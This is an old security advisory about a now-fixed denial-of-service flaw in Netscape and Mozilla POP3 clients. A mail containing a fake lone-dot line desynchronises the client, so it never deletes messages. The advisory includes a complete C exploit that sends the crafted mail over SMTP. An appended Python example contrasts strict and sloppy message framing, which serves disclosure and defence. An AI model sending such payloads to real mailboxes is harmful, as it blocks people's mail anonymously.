////////////////////////////////////////////
///// Strange Software Behaviour Report ///
//// discovered, understood and exploited between 05 and 08 2001
//// (yes, i took the time... :) )
/// eldre8 Wed Jun 12 20:47:59 CEST 2002

\/\/\_/-> System affected:
    Netscape <= 4.77
    Mozilla < 1.1

^\/\/'\-> System not affected:
    Outlook Express 4.72.3110.5
    maybe the other versions of Outlook

|_/\/\\/> Buggy software team contacted about this:
    Yes, the bug is fixed now.

/\/\/\_/> Exploitation: remote & very easy & very anonymous :(

_/\/\/\_> Effects:

With this remote hole we can block any mailbox that is checked with a POP3
client, so webmail like Hotmail or Yahoo is not affected. A single mail causes
the POP3 client to desynchronize from the server and lose the connection, so
it leaves all messages on the server (explained below)...

-/\/\/\/> Explanation:

In SMTP, a mail is sent with a few introductory commands (EHLO, MAIL, RCPT),
then the message text after DATA, and a line containing only a dot tells the
MTA that the message is finished.

On the other side, when a POP3 client checks mail, it connects to the server,
retrieves each message, and considers the download of a message finished when
it sees a dot on a line by itself.

And here is the trick. If we can place a dot on a line by itself, with more
text below it, the client believes the message is finished and tries to
download the next one, and from then on it is desynchronized from the server...

Note from the bytes below that the "dot line" is not a bare ".": it is
CR '.' CR SPACE. That is why it passes the MTA's end-of-data check (the exploit
sends the real terminator afterwards) while still fooling a client that trims
line endings loosely before comparing with ".".

A POP3 client normally acts as follows:
    login to the POP3 server
    retrieve the mails
    delete the mails
    logout

But when it is desynchronized it retrieves the mails and disconnects, so it
never deletes them; the next time it logs in it finds the same mails again,
retrieves them one more time, disconnects, and so on and so on...

A more detailed explanation. Here is the simple end of a normal mail:

    blabla...
    \x0a
    \x0a

and this is the bad mail:

    blabla...
    \x0a\x0d\x2e\x0d\x20\x0a\x0a\x0a
    blabla...
    \x0a\x20\x00
    \x0a

The two 0x0a at the very end seem to have been added by the console; forget
them. At this point you should be able to see the bug...

=\/\/\/-> Possible fixes:

There are different ways to fix this:

- one way, from the client side, is to stop the bad mail by hand: connect
  manually via telnet to the POP3 server, identify the bad message, and do a
  DELE <# of the message>

- a better way is to fix the client itself: the client can get the size of
  each message with the LIST command, so it should be able to retrieve the
  complete message, not less, not more...

- one way is to fix the MTA so it will not accept a message like the one
  produced by the code below...

~\/\/\/~> (buggy:])Exploit:

/* this is the code that comes with my
 * advisory #1 to illustrate this...
 * eldre8 at afturgurluk (double dot minus one) org */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#include <netdb.h>
#include <sys/socket.h>
#include <netinet/in.h>

#define MX "localhost"
#define EHLO "EHLO mx\r\n"
#define MAIL "MAIL FROM: root@localhost\r\n"
#define RCPT "RCPT TO: root@localhost\r\n"
#define DATA "DATA\r\n"
#define QUIT "QUIT\r\n"
#define PORT 25

int sock;
char buffer[255];

void SigCatch(int sig)
{
    fprintf(stderr, "\b\bbye!\n");
    close(sock);
    exit(0);
}

int main()
{
    /* I was too lame to implement the command line... :) */
    int i;
    struct sockaddr_in sout;
    struct hostent *hp;

    signal(SIGINT, SigCatch);
    hp = gethostbyname(MX);
    if (hp == NULL) {
        fprintf(stderr, "gethostbyname: unknown host %s\n", MX);
        return -1;
    }
    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock < 0) {
        perror("sock");
        return -1;
    }
    memset(&sout, 0, sizeof(sout));
    sout.sin_family = AF_INET;
    sout.sin_port = htons(PORT);
    memcpy(&(sout.sin_addr), *(hp->h_addr_list), sizeof(struct in_addr));
    if (connect(sock, (struct sockaddr *)&sout, sizeof(sout)) < 0) {
        perror("connect");
        return -1;
    }

    recv(sock, buffer, 255, 0);            /* receive the banner... */
    send(sock, EHLO, strlen(EHLO), 0);
    recv(sock, buffer, 255, 0);            /* receive the welcome message... */
    send(sock, MAIL, strlen(MAIL), 0);
    recv(sock, buffer, 255, 0);            /* receive the acknowledgement to mail from... */
    send(sock, RCPT, strlen(RCPT), 0);
    recv(sock, buffer, 255, 0);            /* idem, but for the rcpt to... */
    send(sock, DATA, strlen(DATA), 0);
    recv(sock, buffer, 255, 0);            /* 354, go ahead */

    /* the bad mail: LF CR '.' CR SP LF, a dot that is alone on its line once
     * a sloppy client trims the line endings, followed by more text... */
    i = sprintf(buffer, "b4d maIl 1n 4KT1oN!\n\x0a\x0d\x2e\x0d\x20\x0a\x0a\nblabla...\x0a\x20");
    *(buffer+i) = '\0';                    /* ...and an embedded NUL byte */
    sprintf(buffer+i+1, "\n.\n");          /* then the real end-of-data marker */
    send(sock, buffer, i+1+3, 0);          /* send the dumb thing ... */
    recv(sock, buffer, 255, 0);
    send(sock, QUIT, strlen(QUIT), 0);
    recv(sock, buffer, 255, 0);
    close(sock);
    return 0;
}

=_-/\/`-> Greetz/Shouts:

All who know me, and all those I forget here for anonymity reasons...
especially French-speaking boys & girls! ;)
And special greetz to anyone in search of knowledge and to those who
distribute knowledge.

You can find this report on: afturgurluk.org/~eldre8/files/pop3client_dos.txt
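Added example, not code from eldre8's report: the client-side framing the report says a POP3 client should do (read exactly the CRLF-delimited lines the server sends, stop only at the exact line ".", un-stuff a leading "..", and compare the result with the LIST octet count) beside a deliberately sloppy reader modelled on the behaviour the report describes (split on LF, strip whitespace, stop at anything that looks like a lone dot). Both are fed the report's "bad mail" offline. The sample messages, the server-side framing function and the sloppy reader are constructed here for illustration; how a real MTA normalises the bare LFs in the exploit payload before the POP3 server delivers it is MTA-specific, and the sample keeps them as the exploit sent them.

```python
"""POP3 RETR framing (RFC 1939 section 3): strict client vs the sloppy one the
report abuses. Added example; not part of the original advisory."""
import io
from typing import Callable, Optional, Tuple

# Constructed samples. BAD_BODY is the payload the report's exploit sends
# (minus its embedded NUL), with the bare LFs kept as sent (assumption: the
# MTA stored them untouched). DOT_BODY has a legitimate line starting with ".".
GOOD_BODY = b"Subject: hi\r\n\r\nblabla...\r\n"
DOT_BODY = b"Subject: stuffed\r\n\r\n.a line starting with a dot\r\n"
BAD_BODY = b"b4d maIl 1n 4KT1oN!\n\x0a\x0d\x2e\x0d\x20\x0a\x0a\nblabla...\x0a\x20\r\n"


def crlf_lines(data: bytes):
    """Split on CRLF only: a bare CR or LF is message data, not a line end."""
    start = 0
    while start < len(data):
        idx = data.find(b"\r\n", start)
        if idx < 0:
            yield data[start:]
            return
        yield data[start:idx]
        start = idx + 2


def pop3_frame(body: bytes) -> bytes:
    """Server side of RETR: "+OK", the body with any line that starts with "."
    byte-stuffed to "..", then the ".\\r\\n" terminator."""
    out = bytearray(b"+OK message follows\r\n")
    for line in crlf_lines(body):
        if line.startswith(b"."):
            out += b"."
        out += line + b"\r\n"
    out += b".\r\n"
    return bytes(out)


def readline_crlf(stream: io.BytesIO) -> Optional[bytes]:
    """Read one CRLF-terminated line, CRLF stripped. BytesIO.readline stops at
    every LF, so keep appending until the buffer really ends in CRLF."""
    buf = bytearray()
    while True:
        chunk = stream.readline()
        if not chunk:
            if buf:
                raise ConnectionError("connection closed mid-line")
            return None
        buf += chunk
        if buf.endswith(b"\r\n"):
            return bytes(buf[:-2])


def read_multiline_strict(stream: io.BytesIO) -> bytes:
    """Client done right: the terminator is exactly the line ".", and a
    leading ".." is un-stuffed back to "."."""
    status = readline_crlf(stream)
    if status is None or not status.startswith(b"+OK"):
        raise ValueError("RETR failed: %r" % (status,))
    body = bytearray()
    while True:
        line = readline_crlf(stream)
        if line is None:
            raise ConnectionError("connection closed before terminator")
        if line == b".":
            return bytes(body)
        if line.startswith(b".."):
            line = line[1:]
        body += line + b"\r\n"


def read_multiline_sloppy(stream: io.BytesIO) -> bytes:
    """The framing the report abuses (assumed, modelled on its description):
    split on LF, strip whitespace, stop at the first line that looks like a
    lone dot. No un-stuffing either."""
    stream.readline()  # status line
    body = bytearray()
    while True:
        raw = stream.readline()
        if not raw or raw.strip() == b".":
            return bytes(body)
        body += raw


def fetch_message(body: bytes, reader: Callable[[io.BytesIO], bytes]) -> Tuple[bytes, bool, bytes]:
    """One RETR against a server that frames `body` and advertised len(body)
    octets in LIST. Returns the body the client read, whether it matched the
    LIST size (the report's suggested client-side check), and whatever is
    still unread on the connection: non-empty means the next command's reply
    will be read out of sync, the desynchronization the report describes."""
    stream = io.BytesIO(pop3_frame(body))
    got = reader(stream)
    leftover = stream.read()
    return got, len(got) == len(body), leftover


if __name__ == "__main__":
    for name, body in (("good", GOOD_BODY), ("dot", DOT_BODY), ("bad", BAD_BODY)):
        for rname, reader in (("strict", read_multiline_strict), ("sloppy", read_multiline_sloppy)):
            got, ok, rest = fetch_message(body, reader)
            print("%-5s %-6s size_ok=%-5s leftover=%r" % (name, rname, ok, rest))
```

On the good mail both readers agree. On the bad mail the sloppy reader stops at the CR '.' CR SPACE line, reports a body shorter than the LIST size, and leaves the rest of the message plus the real terminator unread on the socket, so its next DELE or RETR reads garbage. The strict reader consumes the whole message and the size check passes. The LIST comparison also catches the sloppy reader's missing un-stuffing on DOT_BODY (one byte too long), which is why the report's second fix is the right one: a client that knows the octet count never has to trust a lone-looking dot.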